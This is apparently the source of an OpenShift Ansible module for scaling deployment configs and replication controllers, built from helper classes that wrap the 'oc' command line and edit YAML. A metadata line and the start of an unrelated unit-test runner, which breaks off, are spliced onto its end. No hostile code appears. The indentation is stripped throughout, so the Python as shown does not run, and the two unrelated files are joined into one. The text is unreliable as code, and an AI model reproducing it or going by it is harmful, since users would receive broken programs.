'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=params['src'],
backup=params['backup'],
content_type=params['content_type'],
backup_ext=params['backup_ext'],
separator=params['separator'])
state = params['state']
if params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and state != 'present':
return {'failed': True,
'msg': 'Error opening file [{}]. Verify that the '.format(params['src']) +
                           'file exists, that it has correct permissions, and is valid yaml.'}
if state == 'list':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['key']:
rval = yamlfile.get(params['key'])
return {'changed': False, 'result': rval, 'state': state}
elif state == 'absent':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['update']:
rval = yamlfile.pop(params['key'], params['value'])
else:
rval = yamlfile.delete(params['key'], params['index'], params['value'])
if rval[0] and params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': state}
elif state == 'present':
# check if content is different than what is in the file
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
params['value'] is None:
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
yamlfile.yaml_dict = content
# If we were passed a key, value then
            # we encapsulate it in a list and process it
# Key, Value passed to the module : Converted to Edits list #
edits = []
_edit = {}
if params['value'] is not None:
_edit['value'] = params['value']
_edit['value_type'] = params['value_type']
_edit['key'] = params['key']
if params['update']:
_edit['action'] = 'update'
_edit['curr_value'] = params['curr_value']
_edit['curr_value_format'] = params['curr_value_format']
_edit['index'] = params['index']
elif params['append']:
_edit['action'] = 'append'
edits.append(_edit)
elif params['edits'] is not None:
edits = params['edits']
if edits:
results = Yedit.process_edits(edits, yamlfile)
# if there were changes and a src provided to us we need to write
if results['changed'] and params['src']:
yamlfile.write()
return {'changed': results['changed'], 'result': results['results'], 'state': state}
# no edits to make
if params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': state}
# We were passed content but no src, key or value, or edits. Return contents in memory
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
        return {'failed': True, 'msg': 'Unknown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, edits=None, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
updated = False
if content is not None:
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
updated = True
elif edits is not None:
results = Yedit.process_edits(edits, yed)
if results['changed']:
updated = True
if updated:
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, name=None, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
elif name is not None:
cmd.append(name)
else:
raise OpenShiftCLIError('Either name or selector is required when calling delete.')
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
cmd.append('-p')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, name=None, selector=None, field_selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
if field_selector is not None:
cmd.append('--field-selector={}'.format(field_selector))
# Name cannot be used with selector or field_selector.
if selector is None and field_selector is None and name is not None:
cmd.append(name)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
        # Ensure results are returned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node schedulable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
cmd.append('--schedulable={}'.format(schedulable))
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
if grace_period:
cmd.append('--grace-period={}'.format(int(grace_period)))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
elif self.namespace is not None and self.namespace.lower() not in ['none', 'empty']: # E501
cmds.extend(['-n', self.namespace])
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"cmd": ' '.join(cmds)}
if output_type == 'json':
rval['results'] = {}
if output and stdout:
try:
rval['results'] = json.loads(stdout)
except ValueError as verr:
if "No JSON object could be decoded" in verr.args:
rval['err'] = verr.args
elif output_type == 'raw':
rval['results'] = stdout if output else ''
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if 'err' in rval or returncode != 0:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class Utils(object): # pragma: no cover
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(str(contents))
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the parsed contents of a resource file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get the openshift version in OpenShift 3.2
# By default, "oc version" in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
version = version[1:] # Remove the 'v' prefix
versions_dict[tech + '_numeric'] = version.split('+')[0]
# "3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = "{}.{}".format(*version.split('.'))
return versions_dict
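# A hedged sketch of how the two helpers above compose; the sample stdout
# below is illustrative, not captured from a real cluster:
#
#   raw = 'oc v3.6.173.0.5\nopenshift v3.6.173.0.5\nkubernetes v1.6.1+5115d708d7'
#   versions = Utils.filter_versions(raw)
#   # -> {'oc': 'v3.6.173.0.5', 'openshift': 'v3.6.173.0.5',
#   #     'kubernetes': 'v1.6.1+5115d708d7'}
#   Utils.add_custom_versions(versions)
#   # -> adds e.g. 'oc_numeric': '3.6.173.0.5' and 'oc_short': '3.6'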
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import rpm
transaction_set = rpm.TransactionSet()
rpmquery = transaction_set.dbMatch("name", "atomic-openshift")
return rpmquery.count() > 0
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
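# A hedged sketch of check_def_equal: 'metadata' and 'status' are skipped
# by default, so only the remaining keys are compared (inputs illustrative):
#
#   user = {'spec': {'replicas': 2}}
#   result = {'spec': {'replicas': 2}, 'metadata': {'name': 'x'}, 'status': {}}
#   Utils.check_def_equal(user, result)  # -> True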
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self, ascommalist=''):
'''return all options as a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs'''
return self.stringify(ascommalist)
def stringify(self, ascommalist=''):
''' return the options hash as cli params in a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs '''
rval = []
for key in sorted(self.config_options.keys()):
data = self.config_options[key]
if data['include'] \
and (data['value'] is not None or isinstance(data['value'], int)):
if key == ascommalist:
val = ','.join(['{}={}'.format(kk, vv) for kk, vv in sorted(data['value'].items())])
else:
val = data['value']
rval.append('--{}={}'.format(key.replace('_', '-'), val))
return rval
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
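# Hedged usage sketch (not part of the original module): how
# OpenShiftCLIConfig turns an options hash into CLI parameters. The option
# names below are illustrative:
#
#   cfg = OpenShiftCLIConfig('myrc', 'default',
#                            '/etc/origin/master/admin.kubeconfig',
#                            {'replicas': {'value': 3, 'include': True},
#                             'service_account': {'value': 'builder', 'include': True}})
#   cfg.to_option_list()  # -> ['--replicas=3', '--service-account=builder']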
# -*- -*- -*- Begin included fragment: lib/deploymentconfig.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class DeploymentConfig(Yedit):
''' Class to model an openshift DeploymentConfig'''
default_deployment_config = '''
apiVersion: v1
kind: DeploymentConfig
metadata:
name: default_dc
namespace: default
spec:
replicas: 0
selector:
default_dc: default_dc
strategy:
resources: {}
rollingParams:
intervalSeconds: 1
maxSurge: 0
maxUnavailable: 25%
timeoutSeconds: 600
updatePercent: -25
updatePeriodSeconds: 1
type: Rolling
template:
metadata:
spec:
containers:
- env:
- name: default
value: default
image: default
imagePullPolicy: IfNotPresent
name: default_dc
ports:
- containerPort: 8000
hostPort: 8000
protocol: TCP
name: default_port
resources: {}
terminationMessagePath: /dev/termination-log
dnsPolicy: ClusterFirst
hostNetwork: true
nodeSelector:
type: compute
restartPolicy: Always
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
triggers:
- type: ConfigChange
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content=None):
''' Constructor for deploymentconfig '''
if not content:
content = DeploymentConfig.default_deployment_config
super(DeploymentConfig, self).__init__(content=content)
def add_env_value(self, key, value):
''' add key, value pair to env array '''
rval = False
env = self.get_env_vars()
if env:
env.append({'name': key, 'value': value})
rval = True
else:
result = self.put(DeploymentConfig.env_path, {'name': key, 'value': value})
rval = result[0]
return rval
def exists_env_value(self, key, value):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key and result['value'] == value:
return True
return False
def exists_env_key(self, key):
''' return whether a key exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key:
return True
return False
def get_env_var(self, key):
'''return an environment variable by name '''
results = self.get(DeploymentConfig.env_path) or []
if not results:
return None
for env_var in results:
if env_var['name'] == key:
return env_var
return None
def get_env_vars(self):
'''return the list of environment variables '''
return self.get(DeploymentConfig.env_path) or []
def delete_env_var(self, keys):
'''delete a list of keys '''
if not isinstance(keys, list):
keys = [keys]
env_vars_array = self.get_env_vars()
modified = False
idx = None
for key in keys:
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
if idx is not None:
    modified = True
    del env_vars_array[idx]
    idx = None
if modified:
return True
return False
def update_env_var(self, key, value):
'''place an env in the env var list'''
env_vars_array = self.get_env_vars()
idx = None
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
if idx is not None:
env_vars_array[idx]['value'] = value
else:
self.add_env_value(key, value)
return True
def exists_volume_mount(self, volume_mount):
''' return whether a volume mount exists '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts:
return False
volume_mount_found = False
for exist_volume_mount in exist_volume_mounts:
if exist_volume_mount['name'] == volume_mount['name']:
volume_mount_found = True
break
return volume_mount_found
def exists_volume(self, volume):
''' return whether a volume exists '''
exist_volumes = self.get_volumes()
volume_found = False
for exist_volume in exist_volumes:
if exist_volume['name'] == volume['name']:
volume_found = True
break
return volume_found
def find_volume_by_name(self, volume, mounts=False):
''' return the index of a volume '''
volumes = []
if mounts:
volumes = self.get_volume_mounts()
else:
volumes = self.get_volumes()
for exist_volume in volumes:
if exist_volume['name'] == volume['name']:
return exist_volume
return None
def get_replicas(self):
''' return replicas setting '''
return self.get(DeploymentConfig.replicas_path)
def get_volume_mounts(self):
'''return volume mount information '''
return self.get_volumes(mounts=True)
def get_volumes(self, mounts=False):
'''return volume information; volume mounts if requested '''
if mounts:
return self.get(DeploymentConfig.volume_mounts_path) or []
return self.get(DeploymentConfig.volumes_path) or []
def delete_volume_by_name(self, volume):
'''delete a volume '''
modified = False
exist_volume_mounts = self.get_volume_mounts()
exist_volumes = self.get_volumes()
del_idx = None
for idx, exist_volume in enumerate(exist_volumes):
if 'name' in exist_volume and exist_volume['name'] == volume['name']:
del_idx = idx
break
if del_idx is not None:
del exist_volumes[del_idx]
modified = True
del_idx = None
for idx, exist_volume_mount in enumerate(exist_volume_mounts):
if 'name' in exist_volume_mount and exist_volume_mount['name'] == volume['name']:
del_idx = idx
break
if del_idx is not None:
    del exist_volume_mounts[del_idx]
modified = True
return modified
def add_volume_mount(self, volume_mount):
''' add a volume or volume mount to the proper location '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts and volume_mount:
self.put(DeploymentConfig.volume_mounts_path, [volume_mount])
else:
exist_volume_mounts.append(volume_mount)
def add_volume(self, volume):
''' add a volume or volume mount to the proper location '''
exist_volumes = self.get_volumes()
if not volume:
return
if not exist_volumes:
self.put(DeploymentConfig.volumes_path, [volume])
else:
exist_volumes.append(volume)
def update_replicas(self, replicas):
''' update replicas value '''
self.put(DeploymentConfig.replicas_path, replicas)
def update_volume(self, volume):
'''update a volume in the volumes list'''
exist_volumes = self.get_volumes()
if not volume:
return False
# update the volume
update_idx = None
for idx, exist_vol in enumerate(exist_volumes):
if exist_vol['name'] == volume['name']:
update_idx = idx
break
if update_idx is not None:
exist_volumes[update_idx] = volume
else:
self.add_volume(volume)
return True
def update_volume_mount(self, volume_mount):
'''update a volume mount in the volume mounts list'''
modified = False
exist_volume_mounts = self.get_volume_mounts()
if not volume_mount:
return False
# update the volume mount
for exist_vol_mount in exist_volume_mounts:
if exist_vol_mount['name'] == volume_mount['name']:
if 'mountPath' in exist_vol_mount and \
str(exist_vol_mount['mountPath']) != str(volume_mount['mountPath']):
exist_vol_mount['mountPath'] = volume_mount['mountPath']
modified = True
break
if not modified:
self.add_volume_mount(volume_mount)
modified = True
return modified
def needs_update_volume(self, volume, volume_mount):
''' verify a volume update is needed '''
exist_volume = self.find_volume_by_name(volume)
exist_volume_mount = self.find_volume_by_name(volume, mounts=True)
results = []
results.append(exist_volume['name'] == volume['name'])
if 'secret' in volume:
results.append('secret' in exist_volume)
results.append(exist_volume['secret']['secretName'] == volume['secret']['secretName'])
results.append(exist_volume_mount['name'] == volume_mount['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'emptyDir' in volume:
results.append(exist_volume_mount['name'] == volume['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'persistentVolumeClaim' in volume:
pvc = 'persistentVolumeClaim'
results.append(pvc in exist_volume)
if results[-1]:
results.append(exist_volume[pvc]['claimName'] == volume[pvc]['claimName'])
if 'claimSize' in volume[pvc]:
results.append(exist_volume[pvc]['claimSize'] == volume[pvc]['claimSize'])
elif 'hostpath' in volume:
results.append('hostPath' in exist_volume)
results.append(exist_volume['hostPath']['path'] == volume_mount['mountPath'])
return not all(results)
def needs_update_replicas(self, replicas):
''' verify whether a replica update is needed '''
current_reps = self.get(DeploymentConfig.replicas_path)
return current_reps != replicas
# -*- -*- -*- End included fragment: lib/deploymentconfig.py -*- -*- -*-
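# Hedged sketch of the DeploymentConfig helpers above, using the class's
# built-in default definition; the values shown are what the accessors
# would return for that default:
#
#   dc = DeploymentConfig()
#   dc.get_replicas()                       # -> 0
#   dc.exists_env_key('default')            # -> True
#   dc.update_env_var('LOG_LEVEL', 'info')  # appends, since no such key exists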
# -*- -*- -*- Begin included fragment: lib/replicationcontroller.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class ReplicationController(DeploymentConfig):
''' Class to model a replicationcontroller openshift object.
Currently we are modeled after a deployment config since they
are very similar. In the future, when the need arises we
will add functionality to this class.
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content):
''' Constructor for ReplicationController '''
super(ReplicationController, self).__init__(content=content)
# -*- -*- -*- End included fragment: lib/replicationcontroller.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_scale.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class OCScale(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5 arguments by default
# pylint: disable=too-many-arguments
def __init__(self,
resource_name,
namespace,
replicas,
kind,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OCScale '''
super(OCScale, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose)
self.kind = kind
self.replicas = replicas
self.name = resource_name
self._resource = None
@property
def resource(self):
''' property function for resource var '''
if not self._resource:
self.get()
return self._resource
@resource.setter
def resource(self, data):
''' setter function for resource var '''
self._resource = data
def get(self):
'''return replicas information '''
vol = self._get(self.kind, self.name)
if vol['returncode'] == 0:
if self.kind == 'dc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = DeploymentConfig(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
if self.kind == 'rc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = ReplicationController(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
return vol
def put(self):
'''update replicas into dc '''
self.resource.update_replicas(self.replicas)
return self._replace_content(self.kind, self.name, self.resource.yaml_dict)
def needs_update(self):
''' verify whether an update is needed '''
return self.resource.needs_update_replicas(self.replicas)
# pylint: disable=too-many-return-statements
@staticmethod
def run_ansible(params, check_mode):
'''perform the idempotent ansible logic'''
oc_scale = OCScale(params['name'],
params['namespace'],
params['replicas'],
params['kind'],
params['kubeconfig'],
verbose=params['debug'])
state = params['state']
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
#####
# Get
#####
if state == 'list':
return {'changed': False, 'result': api_rval['results'], 'state': 'list'} # noqa: E501
elif state == 'present':
########
# Update
########
if oc_scale.needs_update():
if check_mode:
return {'changed': True, 'result': 'CHECK_MODE: Would have updated.'} # noqa: E501
api_rval = oc_scale.put()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'changed': False, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'failed': True, 'msg': 'Unknown state passed. [{}]'.format(state)}
# -*- -*- -*- End included fragment: class/oc_scale.py -*- -*- -*-
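# Hedged sketch of the parameter hash run_ansible expects; it mirrors the
# argument_spec defined in main() below (values illustrative):
#
#   params = {'name': 'router', 'namespace': 'default', 'replicas': 2,
#             'kind': 'dc', 'kubeconfig': '/etc/origin/master/admin.kubeconfig',
#             'debug': False, 'state': 'present'}
#   # OCScale.run_ansible(params, check_mode=False) would query the dc and
#   # scale it to 2 replicas only if the current count differs.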
# -*- -*- -*- Begin included fragment: ansible/oc_scale.py -*- -*- -*-
def main():
'''
ansible oc module for scaling
'''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str', choices=['present', 'list']),
debug=dict(default=False, type='bool'),
kind=dict(default='dc', choices=['dc', 'rc'], type='str'),
namespace=dict(default='default', type='str'),
replicas=dict(default=None, type='int'),
name=dict(default=None, type='str'),
),
supports_check_mode=True,
)
rval = OCScale.run_ansible(module.params, module.check_mode)
if 'failed' in rval:
module.fail_json(**rval)
module.exit_json(**rval)
if __name__ == '__main__':
main()
# -*- -*- -*- End included fragment: ansible/oc_scale.py -*- -*- -*-
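# Hedged playbook usage sketch (illustrative, not taken from the module's
# documentation):
#
#   - name: scale the router to 2 replicas
#     oc_scale:
#       name: router
#       namespace: default
#       kind: dc
#       replicas: 2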
|
sosiouxme/openshift-ansible
|
roles/lib_openshift/library/oc_scale.py
|
Python
|
apache-2.0
| 66,630 | 0.001291 |
from unittest import TestLoader, TextTestRunner, TestSuite
from UnitTests.TableTest import TestTable
from UnitTests.DestinationTest import TestDestination
from UnitTests.CSVReaderTest import TestCSVReader
from UnitTests.ProxyExtractorTest import TestProxyExtractor
from UnitTests.NoProtocolTest import TestNoProtocol
from UnitTests.HttpProtocolTest import TestHttpProtocol
from UnitTests.ProxyTest import TestProxy
def run_tests():
suite_list = []
suite_list.append(TestLoader().loadTestsFromTestCase(TestTable))
suite_list.append(TestLoader().loadTestsFromTestCase(TestDestination))
suite_list.append(TestLoader().loadTestsFromTestCase(TestCSVReader))
suite_list.append(TestLoader().loadTestsFromTestCase(TestProxyExtractor))
suite_list.append(TestLoader().loadTestsFromTestCase(TestNoProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestHttpProtocol))
